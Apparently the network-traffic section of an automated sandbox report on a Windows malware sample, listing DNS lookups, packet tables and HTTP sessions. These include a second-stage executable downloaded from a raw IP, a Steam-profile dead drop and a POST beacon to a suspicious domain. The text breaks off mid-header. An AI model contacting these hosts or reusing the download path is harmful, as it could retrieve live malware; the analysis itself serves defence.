Jan 11, 2025 08:11:38.849639893 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.850863934 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.850872993 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:38.851130009 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:38.860435009 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.860573053 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.860610008 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:38.860675097 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:38.860691071 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:39.793869019 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:39.793982983 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:39.794805050 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:39.794945955 CET	49887	443	192.168.2.10	104.21.96.1
Jan 11, 2025 08:11:39.794965982 CET	443	49887	104.21.96.1	192.168.2.10
Jan 11, 2025 08:11:41.481735945 CET	63324	53	192.168.2.10	162.159.36.2
Jan 11, 2025 08:11:41.486578941 CET	53	63324	162.159.36.2	192.168.2.10
Jan 11, 2025 08:11:41.486637115 CET	63324	53	192.168.2.10	162.159.36.2
Jan 11, 2025 08:11:41.491735935 CET	53	63324	162.159.36.2	192.168.2.10
Jan 11, 2025 08:11:41.988548994 CET	63324	53	192.168.2.10	162.159.36.2
Jan 11, 2025 08:11:41.993571997 CET	53	63324	162.159.36.2	192.168.2.10
Jan 11, 2025 08:11:41.993627071 CET	63324	53	192.168.2.10	162.159.36.2
Jan 11, 2025 08:13:03.348829031 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:13:03.660999060 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:13:04.270266056 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:13:05.473326921 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:13:07.942106009 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:13:12.754585028 CET	49728	80	192.168.2.10	176.113.115.19
Jan 11, 2025 08:13:22.535917044 CET	49728	80	192.168.2.10	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:11:13.425519943 CET	62054	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:13.439551115 CET	53	62054	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.380444050 CET	53522	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.390326023 CET	53	53522	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.406109095 CET	51411	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.415560007 CET	53	51411	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.425578117 CET	49857	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.433794022 CET	53	49857	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.444962025 CET	51251	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.453473091 CET	53	51251	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.457276106 CET	64729	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.465954065 CET	53	64729	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.468799114 CET	61176	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.477649927 CET	53	61176	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.480644941 CET	50645	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.489116907 CET	53	50645	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.492187023 CET	58478	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.504520893 CET	53	58478	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.507322073 CET	62549	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.516988993 CET	53	62549	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:17.519540071 CET	53503	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:17.526742935 CET	53	53503	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:18.845594883 CET	59603	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:18.857011080 CET	53	59603	1.1.1.1	192.168.2.10
Jan 11, 2025 08:11:41.480185032 CET	53	53967	162.159.36.2	192.168.2.10
Jan 11, 2025 08:11:42.023114920 CET	50545	53	192.168.2.10	1.1.1.1
Jan 11, 2025 08:11:42.030114889 CET	53	50545	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 08:11:13.425519943 CET	192.168.2.10	1.1.1.1	0x6030	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.380444050 CET	192.168.2.10	1.1.1.1	0x2aec	Standard query (0)	skidjazzyric.click	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.406109095 CET	192.168.2.10	1.1.1.1	0x6f28	Standard query (0)	soundtappysk.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.425578117 CET	192.168.2.10	1.1.1.1	0x87ff	Standard query (0)	femalsabler.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.444962025 CET	192.168.2.10	1.1.1.1	0x7f21	Standard query (0)	apporholis.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.457276106 CET	192.168.2.10	1.1.1.1	0x55f3	Standard query (0)	crowdwarek.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.468799114 CET	192.168.2.10	1.1.1.1	0x746b	Standard query (0)	versersleep.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.480644941 CET	192.168.2.10	1.1.1.1	0x2754	Standard query (0)	chipdonkeruz.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.492187023 CET	192.168.2.10	1.1.1.1	0x6e3b	Standard query (0)	handscreamny.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.507322073 CET	192.168.2.10	1.1.1.1	0x475	Standard query (0)	robinsharez.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.519540071 CET	192.168.2.10	1.1.1.1	0x2fb9	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.845594883 CET	192.168.2.10	1.1.1.1	0x7479	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:42.023114920 CET	192.168.2.10	1.1.1.1	0x3390	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 08:11:13.439551115 CET	1.1.1.1	192.168.2.10	0x6030	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:13.439551115 CET	1.1.1.1	192.168.2.10	0x6030	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.390326023 CET	1.1.1.1	192.168.2.10	0x2aec	Name error (3)	skidjazzyric.click	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.415560007 CET	1.1.1.1	192.168.2.10	0x6f28	Name error (3)	soundtappysk.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.433794022 CET	1.1.1.1	192.168.2.10	0x87ff	Name error (3)	femalsabler.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.453473091 CET	1.1.1.1	192.168.2.10	0x7f21	Name error (3)	apporholis.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.465954065 CET	1.1.1.1	192.168.2.10	0x55f3	Name error (3)	crowdwarek.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.477649927 CET	1.1.1.1	192.168.2.10	0x746b	Name error (3)	versersleep.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.489116907 CET	1.1.1.1	192.168.2.10	0x2754	Name error (3)	chipdonkeruz.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.504520893 CET	1.1.1.1	192.168.2.10	0x6e3b	Name error (3)	handscreamny.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.516988993 CET	1.1.1.1	192.168.2.10	0x475	Name error (3)	robinsharez.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:17.526742935 CET	1.1.1.1	192.168.2.10	0x2fb9	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.857011080 CET	1.1.1.1	192.168.2.10	0x7479	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.857011080 CET	1.1.1.1	192.168.2.10	0x7479	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.857011080 CET	1.1.1.1	192.168.2.10	0x7479	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.857011080 CET	1.1.1.1	192.168.2.10	0x7479	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.857011080 CET	1.1.1.1	192.168.2.10	0x7479	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.857011080 CET	1.1.1.1	192.168.2.10	0x7479	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:18.857011080 CET	1.1.1.1	192.168.2.10	0x7479	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:11:42.030114889 CET	1.1.1.1	192.168.2.10	0x3390	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

steamcommunity.com

sputnik-1985.com

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49728	176.113.115.19	80	7708	C:\Users\user\Desktop\b0cQukXPAl.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:11:14.451652050 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Jan 11, 2025 08:11:15.156667948 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:11:15 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 11 Jan 2025 07:00:01 GMT ETag: "51600-62b68c29a3e41" Accept-Ranges: bytes Content-Length: 333312 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 72 f6 05 ca 36 97 6b 99 36 97 6b 99 36 97 6b 99 8b d8 fd 99 37 97 6b 99 28 c5 ef 99 13 97 6b 99 28 c5 fe 99 28 97 6b 99 28 c5 e8 99 4c 97 6b 99 11 51 10 99 35 97 6b 99 36 97 6a 99 43 97 6b 99 28 c5 e1 99 37 97 6b 99 28 c5 ff 99 37 97 6b 99 28 c5 fa 99 37 97 6b 99 52 69 63 68 36 97 6b 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 02 9a cc 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 04 00 00 2e 01 00 00 00 00 00 b5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 0e b5 05 00 02 00 00 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$r6k6k6k7k(k((k(LkQ5k6jCk(7k(7k(7kRich6kPELe&.^@@+(( G@\|.textp$& `.data@`*@.rsrc(@@
Jan 11, 2025 08:11:15.156683922 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2d 04 00 98 2d 04 00 ac 2d 04 00 c0 2d 04 00 de 2d 04 00 f4 2d 04 00 0a 2e 04 00 22 2e 04 00 36 2e 04 00 46 2e 04 00 56 2e Data Ascii: ------.".6.F.V.f......../"/2/D/T/d/t////////040H0P0^0p0\|0000001
Jan 11, 2025 08:11:15.156888962 CET	1236	IN	Data Raw: 0e 31 04 00 20 31 04 00 38 31 04 00 4a 31 04 00 62 31 04 00 7a 31 04 00 88 31 04 00 96 31 04 00 a2 31 04 00 b0 31 04 00 ba 31 04 00 d0 31 04 00 e8 31 04 00 f4 31 04 00 0a 32 04 00 32 32 04 00 4c 32 04 00 66 32 04 00 78 32 04 00 86 32 04 00 94 32 Data Ascii: 1 181J1b1z111111111222L2f2x22222222233&383L3\3h3~3333333344,4<4R4b4,h@y@@S@@@
Jan 11, 2025 08:11:15.156904936 CET	1236	IN	Data Raw: 0d 0a 00 00 54 4c 4f 53 53 20 65 72 72 6f 72 0d 0a 00 00 00 53 49 4e 47 20 65 72 72 6f 72 0d 0a 00 00 00 00 44 4f 4d 41 49 4e 20 65 72 72 6f 72 0d 0a 00 00 52 36 30 33 34 0d 0a 41 6e 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 6d 61 64 65 Data Ascii: TLOSS errorSING errorDOMAIN errorR6034An application has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information.R6033- Attempt to use MSIL co
Jan 11, 2025 08:11:15.156917095 CET	1236	IN	Data Raw: 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 0d 0a 00 52 36 30 30 38 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 61 72 67 75 6d 65 6e 74 73 0d 0a 00 00 00 52 36 30 30 32 0d 0a 2d 20 66 Data Ascii: ugh space for environmentR6008- not enough space for argumentsR6002- floating point support not loadedMicrosoft Visual C++ Runtime Library...<program name unknown>Runtime Error!Program:
Jan 11, 2025 08:11:15.156929016 CET	1236	IN	Data Raw: 00 00 ea 3f 00 00 00 38 66 6d e6 3f 03 b2 22 6d 08 3e 22 3e 00 00 00 00 00 00 eb 3f 00 00 00 c4 a7 00 e7 3f 5b 96 e7 3c 63 84 27 3e 00 00 00 00 00 00 ec 3f 00 00 00 bc 6b 8f e7 3f 22 a8 01 e5 15 d3 25 3e 00 00 00 00 00 00 ed 3f 00 00 00 b4 d0 19 Data Ascii: ?8fm?"m>">??[<c'>?k?"%>??@fR8>??T:>?T!?3&F>??<[#>?%?Y:/(A6>??N2>?8O?r!'>
Jan 11, 2025 08:11:15.156964064 CET	1236	IN	Data Raw: df c7 2d 82 4a 67 20 3e 00 00 00 00 00 80 03 40 00 00 00 88 94 f9 f2 3f bc fe 22 61 da 50 4b 3e 00 00 00 00 00 c0 03 40 00 00 00 78 6d 0b f3 3f 2c 53 89 85 da a4 36 3e 00 00 00 00 00 00 04 40 00 00 00 fc e4 1c f3 3f 82 36 cd e9 68 62 22 3e 00 00 Data Ascii: -Jg >@?"aPK>@xm?,S6>@?6hb">@@-?k,<>@X>?0=>@O?IXH>@-_?@>@@n?2E>@P~?=8>@lj?
Jan 11, 2025 08:11:15.156975031 CET	1236	IN	Data Raw: 00 20 10 40 00 00 00 c0 63 45 f5 3f 15 e2 73 c7 94 87 31 3e 00 00 00 00 00 40 10 40 00 00 00 4c a6 4c f5 3f 02 87 6e e8 48 7f 4e 3e 00 00 00 00 00 60 10 40 00 00 00 48 ce 53 f5 3f a9 57 13 98 ec 08 24 3e 00 00 00 00 00 80 10 40 00 00 00 38 dc 5a Data Ascii: @cE?s1>@@LL?nHN>`@HS?W$>@8Z?q;>@a?N/[7>@(h?=mC>@0oo?H75M>@Hv?P.#> @\|?G7>@@*?#42I>`
Jan 11, 2025 08:11:15.156986952 CET	776	IN	Data Raw: 76 da 67 a0 30 8f 2f 3e 00 00 00 00 00 a0 16 40 00 00 00 a8 17 59 f6 3f 6a 76 de 0c 55 8e 47 3e 00 00 00 00 00 c0 16 40 00 00 00 10 e9 5c f6 3f d0 e7 d2 e3 ff 79 4b 3e 00 00 00 00 00 e0 16 40 00 00 00 2c b0 60 f6 3f 41 25 4d 79 81 da 1c 3e 00 00 Data Ascii: vg0/>@Y?jvUG>@\?yK>@,`?A%My>@md?H> @ h?pM>@@0k?k}<>`@ho?f7O>@r?}O>@v?+iI>@@z?b
Jan 11, 2025 08:11:15.156997919 CET	1236	IN	Data Raw: 00 00 00 00 00 a0 1a 40 00 00 00 24 00 c2 f6 3f cc af 81 2f 70 c3 22 3e 00 00 00 00 00 c0 1a 40 00 00 00 8c c9 c4 f6 3f 93 fb ff 5c 28 1c 30 3e 00 00 00 00 00 e0 1a 40 00 00 00 7c 8c c7 f6 3f 5b 73 24 ab 8c f5 46 3e 00 00 00 00 00 00 1b 40 00 00 Data Ascii: @$?/p">@?\(0>@\|?[s$F>@I?dV> @T?0)LK>@@h?)5G5>`@XY?\|zJ>@@?WL?>@0?6:>@<3?QB>
Jan 11, 2025 08:11:15.162534952 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49722	104.21.56.70	443	7708	C:\Users\user\Desktop\b0cQukXPAl.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:14 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2025-01-11 07:11:14 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:11:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BaidRkFVDFojbPocv0f86yCVxLkz4gQlxdYJETEkiOKTc4qE0%2F3Bwh3gAb%2Fv4nMbeVH%2Fu%2Bpb3jOKabX54Q%2FbAcdw4D5Rd2EomuJZxg33x8W1N9KPRlzCnLtORvxz5OJ7qQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90031770ef35c34a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1636&rtt_var=616&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1770770&cwnd=157&unsent_bytes=0&cid=565305484253df69&ts=393&x=0"
2025-01-11 07:11:14 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-11 07:11:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49749	104.102.49.254	443	7940	C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:18 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-11 07:11:18 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 11 Jan 2025 07:11:18 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=724a26203fef83d25bdbdcdd; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-11 07:11:18 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-11 07:11:18 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-11 07:11:18 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-11 07:11:18 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49757	104.21.96.1	443	7940	C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:19 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-11 07:11:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-11 07:11:19 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:11:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=045cd44nn3tepf3e5h09u023js; expires=Wed, 07 May 2025 00:57:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unXK%2FEBaWqtI9cT7HACuBzuyqtjClwJ5TS6PMVh70TBi9Y2V3u5oKuBfZiZek%2FR96YIGMc%2BEB0SobsLzot862ryQayM5UVwBFxvu7l%2F5Nb6%2FLMCtoyWIOBSv8cLyDBaUEAzZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 